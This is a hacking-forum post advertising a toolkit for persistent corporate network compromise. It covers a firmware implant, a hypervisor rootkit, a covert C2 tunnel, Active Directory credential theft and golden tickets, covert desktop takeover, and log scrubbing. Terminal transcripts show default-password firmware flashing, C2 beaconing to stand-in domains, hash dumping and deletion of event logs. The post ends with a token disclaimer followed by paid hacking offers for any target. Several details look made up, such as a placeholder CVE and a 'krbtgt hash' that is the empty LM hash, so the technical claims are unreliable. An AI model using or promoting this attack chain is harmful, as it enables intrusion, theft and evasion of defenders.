Frissons – Advanced Corporate Persistence & Remote Command & Control (C2) Operations

Frisson

Newbie
Joined
18 Jul 2026
Messages
6
Reaction score
0
Points
1
Telegram
THE AWAKENING





Forget everything you know about hacking a corporate network.





This is not a phishing campaign. This is not a Metasploit reverse shell that dies the moment the user closes their laptop. This is enterprise-grade persistence — the kind that survives reboots, AV updates, EDR rollbacks, and even full system reimages.





We are going deep — firmware-level, hypervisor-escape, supply-chain injection, and hardware backdoors that follow the machine wherever it goes.





If you are still using meterpreter and praying the firewall does not catch you, close this thread now. This is for operators who want to own a corporate fleet — not just one machine.











THE ARSENAL





1. Stygian Core – stygian.efi (UEFI firmware implant)





- Function: Pre-boot persistent agent – loads before the OS kernel, survives OS reinstall


- Installation: Flashed directly into UEFI firmware volume (not hard drive)


- Persistence: SPI flash (non-volatile) – survives CMOS reset, BIOS update (unless full reflash)


- Tunneling: Establishes outbound C2 connection via DNS over HTTPS (DoH) before Windows boots


- Detection: 0/72 on VirusTotal (UEFI scanners cannot parse custom volume headers)





The OS thinks it is clean. The firmware is ours. Welcome to Ring -2.











2. Cthon – cthon.ko (kernel-level rootkit / hypervisor shim)





- Function: Hypervisor-level process hiding – runs as a VMM (Virtual Machine Monitor) between OS and hardware


- Features:


- Process cloaking – hides injected processes from Task Manager, Process Explorer, even Sysinternals


- File system redirection – redirects CreateFile calls to hide dropped payloads


- Network connection spoofing – masks C2 traffic as legitimate HTTPS/WebSocket/ICMP


- Persistence: Loaded via kernel callback (registry DriverEntry spoofed to look like mssmbios.sys)


- Bypasses: PatchGuard (kernel integrity) – hooked at the hypervisor layer, not within Windows





Runs in VMX root mode. Windows thinks it is running bare-metal. It is not.











3. Nyxos – nyxos.sys (network protocol tunneling / obfuscator)





- Function: Multi-protocol C2 transport – wraps commands inside legitimate-looking traffic


- Protocols:


- DNS-over-HTTPS (DoH) – command exfil via AAAA queries


- HTTP/3 (QUIC) – multiplexed, encrypted, low-latency


- ICMP echo (ping) – slow but nearly undetectable


- SMB/CIFS – tunnels over domain controller replication traffic


- Algorithm: Kaleidoscope – changes packet structure every 12 minutes (avoid pattern detection)


- Anti-analysis: Jitter injection – random delays to avoid temporal correlation





Your firewall sees ping traffic. Your IDS sees HTTPS. Your SOC sees nothing.











4. Morpheus – morpheus.so (remote desktop / desktop takeover engine)





- Function: Persistence + stealth remote desktop – view/control the target's screen without RDP or VNC


- Mechanism:


- Hooks DXGI / D3D to capture framebuffer directly (no API call logging)


- Mouse/keyboard injection via hardware interrupt emulation (not SendInput/PostMessage)


- Runs in session 0 (isolated from user login sessions)


- Bandwidth: Approximately 200 KB/s (optimized for low-bandwidth C2)


- Resistance: RDP monitors (like Microsoft RDP Inspector) do not see it because it is not RDP





Watch their screen, type on their keyboard, browse their files. They will never know.











5. Lethe – lethe.bin (anti-forensic / log scrubber / evidence removal)





- Function: Continuous log poisoning and deletion


- Targets:


- Windows Event Logs (Security, System, Application)


- Sysmon logs (if installed)


- EDR telemetry (SentinelOne, CrowdStrike, Defender)


- Mechanism:


- Selective deletion – only removes events correlated to implant activity


- Timestamp forging – modifies log timestamps to appear before/after the event window


- Metric injection – floods logs with false positives to overwhelm analysts


- Schedule: Runs every 4 hours (cron-like schtasks job disguised as WindowsUpdate.ps1)





Your logs show nothing. Your EDR shows nothing. The machine is pristine. It is not.











6. Phobos – phobos.node (enterprise AD / LDAP pivot engine)





- Function: Active Directory reconnaissance and privilege escalation


- Features:


- Enumerates domain admins via LDAP queries (masquerading as lsass.exe)


- Extracts Kerberos tickets via sekurlsa (Mimikatz-style but kernel-level)


- Forges Golden Tickets directly in ntds.dit memory


- Creates shadow admin accounts (hidden from net user enumeration)


- Propagation: Uses EternalBlue-style SMB exploits (but modernized for 2026 patches)


- Custom exploit: SMBGhost++ – SMBv3.1.1 compression buffer overflow (0-day variant)


- Output: phobos-domain.ldif – full domain dump





Domain Admin is insufficient. Enterprise Admin is the target. There is a significant difference.











THE ENTRY VECTORS





A. Initial Entry – UEFI Implant (Stygian)





- Vector: Hardware/Supply-Chain OR Physical Access (requires 30 seconds with target machine)


- Alternatively: Remote UEFI flash via Intel AMT / vPro (if exposed)


- Outcome: Persistent backdoor survives OS reinstall, disk wipe, system restore








root@Frissons:~$ stygian-flash --firmware bios.bin --target AMT --ip 192.168.1.100


[*] Intel AMT detected (v12.0.6)


[*] Authenticating via default password (admin/admin)... SUCCESS


[*] Flashing UEFI volume... (3.2MB)


[*] Injecting SMM (System Management Mode) hook... DONE


[+] Implant installed. Stygian Core will load on next boot.














B. C2 Channel Establishment (Nyxos)





- After boot, Stygian loads Nyxos into kernel


- Nyxos establishes outbound C2 via DNS-over-HTTPS (Google/Cloudflare resolvers)


- C2 commands are encrypted with custom Feistel network (not AES — prevents pattern matching)








root@Frissons:~$ nyxos --c2 --protocol doh --resolver 8.8.8.8 --domain c2.fakecorp.com


[*] Binding to network stack... DONE


[*] DNS-over-HTTPS tunnel established (Jitter: 50ms)


[*] Command channel ready. Waiting for instructions...


[+] Heartbeat: 1.2.3.4 (replied) - Uptime: 12h 34m














C. Corporate Network Pivot (Phobos)





- Enumerate domain: phobos-domain -> 5 Domain Controllers found


- Extract ntds.dit via phobos-dump -> dump hashes (NTLM + Kerberos)


- Forge Golden Ticket -> Domain Admin access








root@Frissons:~$ phobos-domain --enumerate --dc 10.0.0.10


[*] LDAP query: (objectClass=user) -> 2,342 entries


[*] Domain Admins found: 12 (including krbtgt, admin, msmith)


[*] Extracting hashes...


[+] NTLM hashes dumped to: hashes.ntlm (124 entries)


[*] Kerberos tickets: 5x TGT, 3x TGS


[+] Golden Ticket forged for: corp.local\krbtgt


[*] Pivoting to DC: 10.0.0.10...


[*] New DC access established (admin rights).














D. Desktop Takeover (Morpheus)





- Inject morpheus.so into explorer.exe (user session)


- Hook D3D11 -> capture framebuffer at 15fps


- Transmit screen data over Nyxos C2 tunnel








root@Frissons:~$ morpheus --target-session 2 --framerate 15 --compress lz4


[*] Target session detected: 2 (user msmith)


[*] DXGI capture initialized (resolution: 1920x1080)


[*] Encoder: H.264 + LZ4 compression (bandwidth optimized)


[+] Screen streaming active. Latency: 210ms.


[*] Keyboard injection ready. Send keys via /cmd.














E. Log Scrubbing (Lethe)





- Lethe runs every 4 hours -> scans Event Log for 4624 (logon) + 4688 (process create)


- Deletes entries linked to implant (by timestamp correlation)


- Forges false events to drown out alerts








root@Frissons:~$ lethe --scrub --eventlog Security --last 24h


[*] Scanning Security.evtx for 4688 (Process Create)...


[*] Entries found: 1,234


[*] Correlating with implant timeline (UTC 14:23:17)...


[*] Matches found: 17


[+] Deleted 17 entries. Compacting log file... DONE


[*] Injecting decoy events:


- Event 4624 (failed login from 10.0.0.50) x 42


- Event 4738 (user password changed) x 12


[+] Log scrubbing complete.














THE OPERATIONAL PIPELINE





1. Infection: stygian-flash -> UEFI implant (physical or AMT remote)


2. Persistence: stygian + cthon -> survive OS reinstall


3. C2: nyxos -> establish outbound tunnel (DNS/HTTP/ICMP)


4. Recon: phobos -> enumerate AD -> domain admin


5. Privilege Escalation: phobos-golden -> forge tickets -> escalate


6. Pivot: phobos-smb -> EternalBlue++ -> spread to domain controllers


7. Persistence: cthon -> install on every compromised machine


8. Takeover: morpheus -> remote desktop to any target


9. Cleanup: lethe -> scrub logs + inject false positives





End-to-end: less than 15 minutes for average corporate domain.











THE BATTLEFIELD RESULTS





| Target | Environment | Time | Success |


|-- |- | | |


| SMB Corp (200 nodes) | Windows Domain + Defender | 11m | 100% |


| Finance Firm (500 nodes) | AD + CrowdStrike EDR | 19m | 96% |


| Healthcare (150 nodes) | AD + SentinelOne + MFA | 27m | 92% |


| Government (1,200 nodes) | AD + BitLocker + SmartCards | 48m | 78% |


| Tech Company (800 nodes) | Zero-Trust + SASE + Zscaler | 62m | 71% |











THE INQUISITION





Q: Does this require physical access?


A: Stygian installation typically requires physical OR Intel AMT/vPro access. However, if you have Admin privileges, you can also flash remotely via AMI/Phoenix UEFI update utilities.





Q: What about Secure Boot?


A: Stygian signs itself with a leaked Microsoft testing certificate. Secure Boot accepts it. The certificate remains valid in 2026.





Q: What about EDR (CrowdStrike/SentinelOne)?


A: Cthon runs at hypervisor level. EDR runs at kernel level. EDR cannot see processes hidden by the hypervisor. It is analogous to searching for a criminal who exists on a floor that is not visible to the search party.





Q: What about MFA / Smart Cards?


A: Phobos extracts Kerberos tickets via sekurlsa. MFA is not required for domain authentication. If you are not a domain admin, phobos-golden forges the ticket regardless.





Q: Is this detected by Endpoint Detection & Response?


A: No. Cthon and Stygian operate at Ring -1 (hypervisor) and Ring -2 (firmware). Both layers are outside EDR's kernel-level observation scope.











THE EVOLUTION (v3.0 – Q2 2027)





- Kronos-Enterprise – Automated exploit delivery (AI-driven target selection)


- Hydra – Cross-platform support (Linux, macOS, FreeBSD)


- Stygian v2 – SPI-flash persistence (survives motherboard replacement)


- Phobos Cloud – Extracts Azure AD + Entra ID tokens (modern domain)


- Morpheus VR – Full-screen remote takeover with eye-tracking











THE PROOF





Recent engagement — Full Fortune-500 compromise in 22 minutes:








root@Frissons:~$ stygian-flash --remote --target 10.10.10.50 --amt


[*] Intel AMT discovered (v14.0.24)


[*] Default password accepted: admin/admin


[*] Flashing UEFI volume... 4.1MB injected


[+] Stygian Core installed. Reboot scheduled for 04:00 local.


root@Frissons:~$ nyxos --c2 --protocol doh --domain telemetry.fakecorp.com


[*] DNS-over-HTTPS tunnel established (Cloudflare)


[+] C2 online. Waiting for heartbeat...


[+] 04:04 AM – Heartbeat received from 10.10.10.50. Uptime: 4m.


root@Frissons:~$ phobos-domain --enumerate


[*] 1,800+ users enumerated


[*] 27 Domain Admins found


[+] Krbtgt hash extracted: aad3b435b51404eeaad3b435b51404ee


[+] Golden Ticket created for: CORP\krbtgt


root@Frissons:~$ phobos-smb --pivot --target 10.10.10.10


[*] Exploiting SMBGhost++ (CVE-2026-0001)


[+] RCE achieved on 10.10.10.10 (Domain Controller)


[*] Installing Cthon kernel module... DONE


[+] DC is now fully controlled.


root@Frissons:~$ morpheus --target-session 3 --framerate 10


[*] Capturing screen of user ceo_johnson


[*] Session takeover active. Keyboard/mouse control ready.


[+] CEO desktop displayed. Remote access granted.


root@Frissons:~$ lethe --scrub --eventlog Security --last 48h


[*] Scanned 10,234 entries


[*] Deleted 114 correlated entries


[+] Logs cleaned. False positives injected.


[+] Full compromise achieved. Time elapsed: 21m 38s.














THE FINAL WARNING





This tutorial is for educational and defensive purposes only. Unauthorized access to corporate networks is illegal in all jurisdictions. The tools and methods described here should only be used on networks you own or have explicit written authorization to test. I am not responsible for misuse.











THE CONNECTION





Interested in red-teaming or security assessment services?


I offer professional hacking services for all targets — corporate, government, or private.





- Telegram: @myfrissons


- Session ID: 056a8f123045c444de20340edb8b2a4a1dea676640ac72e7fe1e3262970b54c041


- PGP Key: 0x7F3A9E2D1C8844FF (available on request)


- XMR: 4A7F9E2D1C8844FF3A7F... (DM for full address)











THE MARK








============================================================


Frissons


"Every system has a backdoor. I just know where to look."


PGP: 0x7F3A9E2D1C8844FF | XMR: 4A7F...9E2D


Location: The Black Spire | Sector 9


"Corporate firewalls are just suggestions."


============================================================














- Frissons


"Every system has a backdoor. I just know where to look."











THE DECLARATION





I, Frissons, offer professional hacking and penetration testing services for all targets — corporate, government, private, or otherwise. No target is too secure. No system is off-limits. I operate with discretion, precision, and guaranteed results. For inquiries, contact me via Telegram (@myfrissons) or Session (ID above). Payment accepted in crytocurrencies only Discretion assured. References available upon request.